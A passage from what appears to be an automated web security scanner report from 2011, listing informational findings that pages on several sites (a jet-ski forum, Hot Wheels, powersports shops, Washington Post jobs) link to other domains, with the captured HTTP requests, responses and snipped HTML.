<!-- Do not remove this copyright notice -->
   Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a>
...[SNIP]...
23.69. http://www.greenhulk.net/forums/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://www.amsoil.com/redirect.cgi?zo=1499968&page=index'><img src='images/amsoil.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://pwcperformance.com'><img src='images/performance.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm'><img src='images/oe.gif' />
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<blockquote class="postcontent restore ">
                           <a href="http://www.aquaperformance.com/pwcpricelist.html#yamaha" target="_blank">http://www.aquaperformance.com/pwcpricelist.html#yamaha</a>
...[SNIP]...
<blockquote class="postcontent restore ">
                           Boarding Steps <img src="http://www.rivayamaha.com/RivaStore/images/boarding_step.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /> Provides a wide stepping surface for ease of boarding, especially in deep water. Made from 6016-T6 aircraft-quality aluminum. Features a foam-padded step for comfort. Retracts automatically after use. <a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM FX140/FX-HO &#96;03~07" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-FX-06Boarding Step, YAM FX140/FX-HO `03~07$ 215.89 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-FX-06" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM SUV" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-SU-V1Boarding Step, YAM SUV$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-SU-V1" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM XLL/XLT" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-XL-LTBoarding Step, YAM XLL/XLT$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-XL-LT" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM XL700/WaveVenture All" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-X1-V1Boarding Step, YAM XL700/WaveVenture All$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-X1-V1" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" />
                       </blockquote>
...[SNIP]...
<br />
<a href="http://wcporting.com/" target="_blank">wcporting.com/</a>
...[SNIP]...
<div class="blockrow"><a href="http://www.4-tecperformance.com/">PWC Performance Store</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=products_new">New Products</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=18">Sea Doo Parts</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=18_47">Performance Packages</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16">Yamaha Parts</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16_82">SHO/FZ Packages</a><br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=16_168">VXR/VXS Packages</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17">Kawasaki Parts</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17_177"><i>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=17_60">250/260 X & LX Packages</a><br />
<a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=106">MoTeC Engine Management</a>
...[SNIP]...
<br />
<a href="http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm">OEM Parts Finder</a>
...[SNIP]...
<br />
<a href="http://www.amsoil.com/redirect.cgi?zo=1499968&page=index">Order Amsoil</a>
...[SNIP]...
<br />
&nbsp;- <a href="http://www.x-h2o.com/">XH20</a><br />
&nbsp;- <a href="http://www.motasdeagua.com/">Portugal PWC</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<li style="align:center; text-align: center;"><a href="http://www.vbulletin.org/forum/showthread.php?t=233871" style="font-size: 10px; color: gray;">Everywhere sidebar 1.4.1</a>
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!-- Do not remove this copyright notice -->
   Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a>
...[SNIP]...
<br /><a href="http://advertising.digitalpoint.com/" target="_blank">Advertising positioning</a>
...[SNIP]...
23.70. http://www.hotwheelscollectors.com/HWCErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /HWCErrorPage.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /HWCErrorPage.aspx?errID=404 HTTP/1.1
Host: www.hotwheelscollectors.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=nt3qwb55gans5433wc3ilm55

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:33:20 GMT
Server: MII-WSD/1.4
Cache-Control: no-cache=,no-store=
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: NSC_Dpmmfdupst_Ipuxiffmt=440af0e93660;expires=Mon, 02-May-11 03:03:50 GMT;path=/
Cache-Control: max-age=0
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Content-Type: text/html; charset=utf-8
Content-Length: 30101
Via: 1.1 mdw107102 (MII-APC/1.6)


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta http-equiv="content-language"
...[SNIP]...
</script>

<script type="text/javascript" src="http://tracker.mattel.com/?hotwheelscollector"></script>
<noscript><img id="dcsimg_v8" width="1" height="1" src="http://statse.webtrendslive.com/dcsf5g6jw000004jtaoxtxjha_8f5o/njs.gif?dcsuri=%2fHWCErrorPage.aspx%3ferrID%3d404&amp;WT.js=No&amp;WT.tv=8.0.0&amp;brand=hotwheelscollector" alt="" border="0" /></noscript>
...[SNIP]...
<li class="imatm" style="width:65px;"><a href="http://www.hotwheelsshop.com/" himg="/images/globalmenu30/nav_shop_on.gif" style="background-image:url(/images/globalmenu30/nav_shop_off.gif);background-repeat:no-repeat;background-position:left top;"></a>
...[SNIP]...
</span> &nbsp; &nbsp;
   <a href="http://www.facebook.com/hotwheels" title="Facebook" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/ver3_0/facebook_logo.png" alt="Facebook" width="25" height="25" border="0"></a> &nbsp; &nbsp;&nbsp;
   <a href="http://twitter.com/hotwheelsonline" title="Twitter" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/shared/twitter_logo.png" alt="Twitter" width="25" height="25" border="0"></a> &nbsp; &nbsp;
   <a href="http://www.youtube.com/hotwheels" title="YouTube" class="footer" style='text-decoration: none;' target="_blank" > <img src="/images/shared/youtube_logo.png" alt="YouTube" width="69" height="25" border="0">
...[SNIP]...
<p style="margin:8px 0 4px 0;">
<a href="http://corporate.mattel.com/privacy-policy.aspx" target="_blank" class="footer">ONLINE PRIVACY POLICY</a>
...[SNIP]...
<p style="margin:0 0 4px 0;">
<a href="http://corporate.mattel.com/global/terms-conditions.aspx" target="_blank" class="footer"> Terms and Conditions</a> &nbsp;
<a href="http://corporate.mattel.com/global/Shopping-Terms-collectors.aspx" target="_blank" class="footer"> Website Shopping Terms of Sale</a>
...[SNIP]...
</script><a href="http://www.opencube.com" style="display:none;">Infinite Menus, Copyright 2006, OpenCube Inc. All Rights Reserved.</a>
...[SNIP]...
23.71. http://www.ibegin.com/weather/weather_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:42:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 773


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a>
...[SNIP]...
23.72. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Navigation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Navigation.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Navigation.asp?Type=11 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:25:38 GMT
Content-Length: 7841
Content-Type: text/html
Cache-control: private

   
<html>
<head>
<title>Xtreme Powersports' Check Out Navigation</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript"
src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js"
type="text/javascript"></script>
...[SNIP]...
23.73. http://www.ronniesmailorder.com/fiche_select1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/flash_loader.js" language="javascript"></script>
<script src="http://www.powersportsnetwork.com/jquery_min.js" language="javascript"></script>
...[SNIP]...
<li style="width:110px;"><a class="HDR_VERT_LINKOFF" target="_new" href="http://stores.ebay.com/RONNIES-POWERSPORTS/USED-PARTS-/_i.html?_fsub=2145074014&_sid=26334804&_trksid=p4634.c0.m322"><nobr>
...[SNIP]...
<li style="width:150px;"><a class="HDR_VERT_LINKOFF" target="_new" href="http://stores.ebay.com/Ronnies-Powersports"><nobr>
...[SNIP]...
</div><img src="http://cdn-9.psndealer.com/e2/dealersite/images/ronniesmailorder/header.jpg" width="956" height="161" border="0" usemap="#Map"></TD>
...[SNIP]...
<!--CENTER CONTENT AREA-->
                   <img height="10" src="http://cdn-9.psndealer.com/e2/dealersite/images/ronniesmailorder/content_top_detail0.jpg"><BR>
...[SNIP]...
<a href="./fiche_select.asp?srt=mfg" style="vertical-align:middle;" class="NV_mod_detail_breadCrumbs_text">
       
    <img style="text-decoration:none; border:0px;" src="http://cdn-9.psndealer.com/e2/dealersite/images/kawasaki_logo.jpg" alt="Kawasaki" width="100">
   
        </a>
...[SNIP]...
<span class="indicator" id="2011_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2010_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2009_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2008_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2007_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2006_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2005_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2004_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2003_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2002_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2001_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="2000_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1999_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1998_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1997_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1996_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1995_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1994_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1993_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1992_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1991_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1990_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1989_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1988_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1987_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1986_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1985_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<span class="indicator" id="1984_indicator"><img src="http://cdn-9.psndealer.com/e2/dealersite/images/plus.gif"</span><span class="NV_mod_detail_headers_text">
...[SNIP]...
<TD WIDTH="178" VALIGN="BOTTOM"><a target="PSN" HREF="http://www.powersportsinfo.com/miscpage_002.asp"><IMG SRC="http://cdn-9.psndealer.com/e2/dealersite/images/spacer.gif" border="0" width="147" height="20"></A>
...[SNIP]...
</A>
                    <a href="http://www.powersportsnetwork.com" target="PSN" class="dummy"><font color="White" size="1" face="Arial">
...[SNIP]...
<area shape="rect" coords="418,3,783,37" href="http://www.ronniesmailorder.com/policy.asp">
<area shape="rect" coords="664,76,771,113" href="http://www.facebook.com/ronniesmailorder" target="_blank" alt="Facebook">
</map>
...[SNIP]...
23.74. http://www.seoq.com/ajaxAction.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /ajaxAction.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajaxAction.php?url=onlinemicrofiche.com&sid=0.2201897264458239 HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:28:43 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:28:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"></a><a href="http://del.icio.us/post?url=http://www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"></a><a href="http://www.stumbleupon.com/submit?url=www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seoq.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31">
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
ur community of business owners, webmasters and SEO professionals to stay on top of emerging search and social media marketing trends.
| Copyright &copy; 2011 SEO Quotient&trade; All Rights Reserved | <a href="http://www.inqbation.com/" alt="washington dc web designer" target="_blank">washington dc web designer</a> : <a href="http://www.inqbation.com/" alt="washington dc web designer inQbation" target="_blank">inQbation</a>
...[SNIP]...
23.75. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</script>

<script src="https://js.revsci.net/gateway/gw.js?csid=J05531"></script>
...[SNIP]...
</div>        
   
   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
<div class="jobsBox3_content jobsMicrotile">
                           <a href="https://www2.recruitingcenter.net/Clients/catapulttechnology/PublicJobs/controller.cfm" target="microtile"><img src="http://www.washingtonpost.com/wp-adv/jobs4/microtileImages/1210795891252_Catapult.gif" height="19" width="122" border="0"/>
...[SNIP]...
</strong> <a href="https://www2.recruitingcenter.net/Clients/catapulttechnology/PublicJobs/controller.cfm" target="microtile">High Tech company now hiring</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=3005617&cv=2.0&cj=1" />
</noscript>
...[SNIP]...
23.76. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_footer.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wp-adv/jobs4/javascript/jobs_footer.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 18:47:39 GMT
ETag: "1ec4-4c93b7cb"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7876

function showGlobalFooter(node) {
   //_gnpost.timesThrough = 1;
   //placeChannelNav(node);
   //commenting out new footer
   //document.write("<div style='width:970' id='footer'>");
